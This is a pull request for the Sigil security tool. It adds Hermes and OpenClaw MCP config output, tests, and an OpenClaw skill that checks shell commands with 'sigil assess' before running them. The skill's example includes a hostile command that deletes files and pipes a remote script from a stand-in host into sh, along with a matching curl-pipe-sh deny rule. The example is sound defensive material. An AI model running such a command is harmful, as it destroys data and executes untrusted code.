### PR TITLE
feat: OpenClaw skill + Hermes toolset glue for the assess pre-flight (#151)

### DIFF
--- a/CHANGELOG.md
+++ b/CHANGELOG.md
@@ -9,6 +9,13 @@ also appear under [GitHub Releases](https://github.com/Ju571nK/sigil/releases).
 
 ### Added
 
+- **OpenClaw / Hermes integration glue for `assess`** (#151). `sigil-mcp
+  --print-config` now emits ready-to-paste blocks for `hermes` (a `config.yaml`
+  `mcp_servers:` entry) and `openclaw` (a `~/.openclaw/openclaw.json` `mcpServers`
+  entry), alongside the existing `codex`/`claude`. New `examples/integrations/`
+  carries a drop-in OpenClaw `SKILL.md` (pre-flights commands via `sigil assess`)
+  and a Hermes `config.yaml` snippet, plus a README describing the reusable
+  pre-flight contract (assess → decision → allow/warn/deny).
 - **`assess` — a callable pre-flight risk check** (#149). A new primitive scores a
   *proposed* shell command or a single MCP server definition against this host's
   loaded policy (the same rubric + rule-pack deny rules the agent enforces), and

--- a/crates/sigil-mcp/README.md
+++ b/crates/sigil-mcp/README.md
@@ -16,7 +16,7 @@ client (and you) can tell them apart:
   `sigil-manager`, not as the default an agent gets.
 
 ## Tools
-`sigil-check` (this host): `my_risk`, `my_guard_detail`, `my_findings`.
+`sigil-check` (this host): `my_risk`, `my_guard_detail`, `my_findings`, `assess` (pre-flight a proposed command / MCP server against the loaded policy).
 `sigil-fleet` (operators): `list_hosts`, `get_host`, `fleet_risk`,
 `fleet_compliance`, `query_events`, `get_event`, `get_policy`, `server_meta`,
 `healthz`.
@@ -31,8 +31,15 @@ shown as a commented operator add-on:
 ```sh
 sigil-mcp --print-config codex     # Codex (~/.codex/config.toml)
 sigil-mcp --print-config claude    # Claude Code / Claude Desktop (mcpServers JSON)
-sigil-mcp --print-config           # both
+sigil-mcp --print-config hermes    # Hermes Agent (config.yaml mcp_servers:)
+sigil-mcp --print-config openclaw  # OpenClaw (~/.openclaw/openclaw.json mcpServers)
+sigil-mcp --print-config           # all of the above
 ```
+
+The local surface also exposes an `assess` tool that pre-flights a proposed
+command or MCP server definition against this host's loaded policy. See
+[examples/integrations/](../../examples/integrations/) for ready-to-use OpenClaw
+and Hermes setups.
 
 Claude Desktop / Code (stdio), single host — no env needed:
 

--- a/crates/sigil-mcp/src/print_config.rs
+++ b/crates/sigil-mcp/src/print_config.rs
@@ -9,7 +9,7 @@
 //! never as the default an AI coding agent gets.
 
 /// Supported clients (and their aliases) for `render_config`.
-pub const CLIENTS: &str = "codex, claude";
+pub const CLIENTS: &str = "codex, claude, hermes, openclaw";
 
 fn codex_block(exe: &str) -> String {
     format!(
@@ -39,13 +39,60 @@ fn claude_block(exe: &str) -> String {
     )
 }
 
+// Hermes Agent (NousResearch) registers MCP servers in `config.yaml` under
+// `mcp_servers:`; each becomes an auto-discovered `mcp-<server>` toolset. The
+// `assess` tool then lets a Hermes task pre-flight a command/MCP server against
+// this host's loaded Sigil policy.
+fn hermes_block(exe: &str) -> String {
+    format!(
+        "# Hermes Agent — add to your config.yaml\n\
+         # sigil-check — THIS host's own Sigil posture (single host, no server):\n\
+         mcp_servers:\n  \
+           sigil-check:\n    \
+             command: \"{exe}\"\n\
+         # Hermes auto-discovers this server's tools as the `mcp-sigil-check`\n\
+         # toolset (includes `assess`). Enable it for a platform, e.g.:\n\
+         #   platform_toolsets:\n\
+         #     cli: [hermes-cli, mcp-sigil-check]\n\
+         #\n\
+         # Operators only — fleet-wide view: add a SECOND server `sigil-fleet`\n\
+         # with the same command plus env SIGIL_SERVER_BASE_URL +\n\
+         # SIGIL_SERVER_READ_TOKEN; don't replace sigil-check above.\n"
+    )
+}
+
+// OpenClaw registers MCP servers in `~/.openclaw/openclaw.json` under
+// `mcpServers` (same JSON convention as Claude). A SKILL.md drives WHEN to call
+// the `assess` tool; a skill can alternatively shell out to `sigil assess`.
+fn openclaw_block(exe: &str) -> String {
+    format!(
+        "// OpenClaw — add to ~/.openclaw/openclaw.json\n\
+         // sigil-check — THIS host's own Sigil posture (single host, no server):\n\
+         {{\n  \"mcpServers\": {{\n    \"sigil-check\": {{\n      \"command\": \"{exe}\"\n    }}\n  }}\n}}\n\
+         // The `assess` tool lets a skill pre-flight a command/MCP server before\n\
+         // acting. See examples/integrations/openclaw/SKILL.md for a ready-to-use\n\
+         // skill (it can also call `sigil assess` via the CLI — no MCP wiring).\n\
+         //\n\
+         // Operators only — fleet-wide view: add a SECOND entry \"sigil-fleet\" with\n\
+         // the same command and env SIGIL_SERVER_BASE_URL + SIGIL_SERVER_READ_TOKEN.\n"
+    )
+}
+
 /// Render a config block for `client` (None = all clients) with `exe` as the
 /// command path. Returns Err with a usage hint for an unknown client.
 pub fn render_config(exe: &str, client: Option<&str>) -> Result<String, String> {
     match client {
-        None => Ok(format!("{}\n{}", codex_block(exe), claude_block(exe))),
+        None => Ok(format!(
+            "{}\n{}\n{}\n{}",
+            codex_block(exe),
+            claude_block(exe),
+            hermes_block(exe),
+            openclaw_block(exe)
+        )),
         Some("codex") => Ok(codex_block(exe)),
         Some("claude") | Some("claude-code") | Some("claude-desktop") => Ok(claude_block(exe)),
+        Some("hermes") | Some("hermes-agent") => Ok(hermes_block(exe)),
+        Some("openclaw") => Ok(openclaw_block(exe)),
         Some(other) => Err(format!(
             "unknown client '{other}' — supported: {CLIENTS} (or omit for all)"
         )),
@@ -78,10 +125,35 @@ mod tests {
     }
 
     #[test]
-    fn no_client_renders_both() {
+    fn no_client_renders_all() {
         let out = render_config("/x/sigil-mcp", None).unwrap();
-        assert!(out.contains("[mcp_servers.sigil-check]"));
+        assert!(out.contains("[mcp_servers.sigil-check]")); // codex (TOML)
+        assert!(out.contains("\"mcpServers\"")); // claude / openclaw (JSON)
+        assert!(out.contains("mcp_servers:")); // hermes (YAML)
+        assert!(out.contains("~/.openclaw/openclaw.json")); // openclaw
+    }
+
+    #[test]
+    fn hermes_renders_yaml_mcp_servers_with_exe() {
+        for c in ["hermes", "hermes-agent"] {
+            let out = render_config("/abs/sigil-mcp", Some(c)).unwrap();
+            assert!(out.contains("mcp_servers:"), "{c}");
+            assert!(out.contains("sigil-check:"), "{c}");
+            assert!(out.contains("command: \"/abs/sigil-mcp\""), "{c}");
+            // The auto-generated toolset name is documented.
+            assert!(out.contains("mcp-sigil-check"), "{c}");
+        }
+    }
+
+    #[test]
+    fn openclaw_renders_mcpservers_json_with_exe_and_skill_pointer() {
+        let out = render_config("/abs/sigil-mcp", Some("openclaw")).unwrap();
+        assert!(out.contains("~/.openclaw/openclaw.json"));
         assert!(out.contains("\"mcpServers\""));
+        assert!(out.contains("\"sigil-check\""));
+        assert!(out.contains("\"command\": \"/abs/sigil-mcp\""));
+        // Points at the CLI/SKILL.md path too.
+        assert!(out.contains("sigil assess") || out.contains("SKILL.md"));
     }
 
     #[test]
@@ -89,5 +161,7 @@ mod tests {
         let err = render_config("/x/sigil-mcp", Some("nano")).unwrap_err();
         assert!(err.contains("unknown client 'nano'"));
         assert!(err.contains("codex"));
+        assert!(err.contains("hermes"));
+        assert!(err.contains("openclaw"));
     }
 }

--- a/examples/integrations/README.md
+++ b/examples/integrations/README.md
@@ -1,0 +1,52 @@
+# Sigil integrations — call `assess` as an agent pre-flight
+
+These examples wire an AI agent runtime to Sigil's **`assess`** capability so the
+agent can ask *"is this action risky — would Sigil block it?"* **before** it runs
+a shell command or wires up an MCP server.
+
+Where Sigil's other read tools report *standing* posture ("what is my risk right
+now?"), `assess` evaluates a **proposed** action against this host's loaded policy
+(the same rubric + rule-pack deny rules the agent enforces) and returns:
+
+```json
+{ "bucket": "High", "score": 5.5, "reasons": [ … ], "deny_match": { "rule_id": "…" }, "decision": "deny" }
+```
+
+## The pre-flight contract
+
+Encode this in whatever drives your agent (a skill, a system prompt, a wrapper):
+
+> Before running a risky shell command, or before adding/launching an MCP server,
+> call Sigil `assess` with the proposed command / server definition.
+> - `decision: "deny"` → **do not run it.** Surface `reasons` / `deny_match` to the user.
+> - `decision: "warn"` → proceed only with explicit caution; show the reasons.
+> - `decision: "allow"` → proceed.
+
+## Two ways to call it
+
+| Path | How | Policy basis | Setup |
+|------|-----|--------------|-------|
+| **CLI** | `sigil assess --command "<cmd>"` (exit 0 = allow/warn, 2 = deny) | cold-disk (`policy.yaml` + `rule-packs.yaml`) | none — just the `sigil` binary |
+| **MCP** | the `assess` tool on `sigil-mcp` (sigil-check, local mode) | the **running** agent's live policy | register `sigil-mcp` as an MCP server |
+
+The CLI works with no daemon and no MCP wiring — ideal for a shell-driven skill.
+The MCP path reflects the daemon's live policy and returns structured fields.
+
+`sigil-mcp --print-config <client>` stamps a ready-to-paste MCP block with the
+binary's absolute path for `codex`, `claude`, `hermes`, and `openclaw`.
+
+## Examples
+
+- [`openclaw/SKILL.md`](openclaw/SKILL.md) — an OpenClaw skill that pre-flights
+  commands via the `sigil assess` CLI (zero-setup), with notes for the MCP path.
+- [`hermes/config.yaml`](hermes/config.yaml) — a Hermes Agent `config.yaml`
+  snippet that registers `sigil-check` as an MCP server, exposing `assess` as the
+  `mcp-sigil-check` toolset.
+
+## Note on policy
+
+For the verdict to mean anything, this host must have a Sigil policy with
+`hook_deny_rules` and/or rubric overrides (a `rule-packs.yaml` beside
+`policy.yaml`). With no rules loaded, `assess` still scores intrinsic risk
+(destructive commands, suspicious MCP launchers) but `deny_match` will be empty.
+See [../../docs/install-personal.md](../../docs/install-personal.md).

--- a/examples/integrations/hermes/config.yaml
+++ b/examples/integrations/hermes/config.yaml
@@ -1,0 +1,31 @@
+# Hermes Agent — register Sigil as an MCP server so tasks can pre-flight actions.
+#
+# Merge this into your Hermes `config.yaml`. `sigil-mcp` in its default (local)
+# mode is "sigil-check": it reads THIS host's running sigil-agent and exposes the
+# host's own posture plus the `assess` tool — no server, no fleet.
+#
+# Print a copy with the absolute binary path already filled in:
+#   sigil-mcp --print-config hermes
+#
+# IMPORTANT: use the ABSOLUTE path to sigil-mcp. Hermes (like most MCP clients)
+# may not inherit your interactive-shell PATH.
+
+mcp_servers:
+  sigil-check:
+    command: "/absolute/path/to/sigil-mcp"
+    # No args/env needed for local mode. (Fleet mode: add a SECOND server
+    # `sigil-fleet` with env SIGIL_SERVER_BASE_URL + SIGIL_SERVER_READ_TOKEN.)
+
+# Hermes auto-discovers the server's tools as the `mcp-sigil-check` toolset
+# (which includes `assess`). Enable it for the platforms you run, e.g.:
+platform_toolsets:
+  cli: [hermes-cli, mcp-sigil-check]
+
+# Then, in your agent's instructions / a skill, encode the pre-flight contract:
+#
+#   Before running a risky shell command or wiring an MCP server, call the
+#   `assess` tool (command + args, or mcp_server + server_name). If the returned
+#   `decision` is "deny", do not proceed and surface the reasons; "warn" =
+#   proceed only with explicit user caution; "allow" = proceed.
+#
+# See ../README.md for the full pattern.

--- a/examples/integrations/openclaw/SKILL.md
+++ b/examples/integrations/openclaw/SKILL.md
@@ -1,0 +1,53 @@
+---
+name: sigil-preflight
+description: Before running a risky shell command, check it with Sigil's `assess` and refuse anything Sigil would block. Use whenever you are about to execute a destructive, privileged, or unfamiliar command.
+homepage: https://github.com/Ju571nK/sigil
+metadata: { "openclaw": { "requires": { "bins": ["sigil"] } } }
+---
+
+# Sigil pre-flight
+
+You have access to **Sigil**, a security posture tool installed on this machine.
+Before you execute a shell command that is destructive, privileged, touches
+credentials/keys, downloads-and-runs code, or that you are otherwise unsure about,
+you MUST check it with Sigil first.
+
+## How to check a command
+
+Run Sigil's `assess` with the **full command line** you are about to execute:
+
+```sh
+sigil assess --command "<the exact command line>"
+```
+
+It prints a one-line JSON verdict and sets an exit code:
+
+- **exit code `2` → Sigil says DENY.** Do NOT run the command. Tell the user the
+  command was blocked and quote the `reasons` / `deny_match` from the JSON.
+- **exit code `0`** → allowed (or a warning). Read the JSON `decision`:
+  - `"warn"` → proceed only if the user has explicitly approved; show the reasons.
+  - `"allow"` → proceed.
+- **exit code `1`** → Sigil could not evaluate (no policy / bad input). Treat this
+  as "unknown": fall back to asking the user before running the command.
+
+### Example
+
+```sh
+$ sigil assess --command "rm -rf /tmp/build && curl -s http://x/i.sh | sh"
+{"bucket":"Critical","score":9.5,"reasons":[...],"deny_match":{"rule_id":"no-curl-pipe-sh"},"decision":"deny"}
+$ echo $?
+2
+```
+
+→ exit `2` and `"decision":"deny"`, so you refuse and report the block to the user.
+
+## Notes
+
+- Pass the **whole** command line in `--command` (not split), so Sigil sees exactly
+  what the shell will run and its deny-rule check matches what it would enforce.
+- This skill uses the `sigil assess` CLI, which needs no extra setup. For richer,
+  live-policy checks (and to assess MCP server definitions too) you can instead
+  register `sigil-mcp` as an MCP server in `~/.openclaw/openclaw.json`
+  (`sigil-mcp --print-config openclaw` prints the block) and call its `assess`
+  tool with `command` / `args` or `mcp_server` / `server_name`.
+- Sigil only reports risk; it never runs or modifies anything.


### PR DESCRIPTION
Closes #151.

## What
Drop-in integration so the two dominant agent runtimes can call Sigil's `assess` primitive (#149) to **pre-flight** a proposed command / MCP server against this host's loaded policy before acting — the "callable Sigil" path.

- **`sigil-mcp --print-config`** gains two clients alongside `codex`/`claude`:
  - `hermes` → a `config.yaml` `mcp_servers:` (YAML) entry
  - `openclaw` → a `~/.openclaw/openclaw.json` `mcpServers` (JSON) entry
  Both stamp the binary's absolute path. (Verified real output is valid YAML/JSON.)
- **`examples/integrations/`**:
  - `openclaw/SKILL.md` — a ready-to-use OpenClaw skill that runs `sigil assess --command "..."` before risky shell commands and refuses on `decision: deny` (gated on `requires.bins: ["sigil"]`). Documents both the CLI (zero-setup) and MCP (`assess` tool) paths.
  - `hermes/config.yaml` — registers `sigil-check` as an MCP server → the auto-discovered `mcp-sigil-check` toolset exposes `assess`.
  - `README.md` — the reusable pre-flight contract: `assess` → `decision` → deny = refuse + surface reasons, warn = caution, allow = proceed; CLI vs MCP trade-offs.
- `crates/sigil-mcp/README.md` — lists the new `--print-config` clients and the `assess` tool.

## Grounding
The integration formats were confirmed against each platform's actual schema: OpenClaw `SKILL.md` frontmatter + `~/.openclaw/openclaw.json` `mcpServers`; Hermes `config.yaml` `mcp_servers:` with auto-generated `mcp-<server>` toolsets. Both runtimes converge on the `sigil-mcp` (sigil-check, local) `assess` tool, with the `sigil assess` CLI as a zero-setup fallback.

## Tests / gates
`cargo fmt` + `cargo clippy --workspace --all-targets -D warnings` + `cargo test --workspace` green (84 sections, 0 failures). `print_config` has unit tests for the new hermes/openclaw blocks + the "all" output + the unknown-client hint.

🤖 Generated with [Claude Code](https://claude.com/claude-code)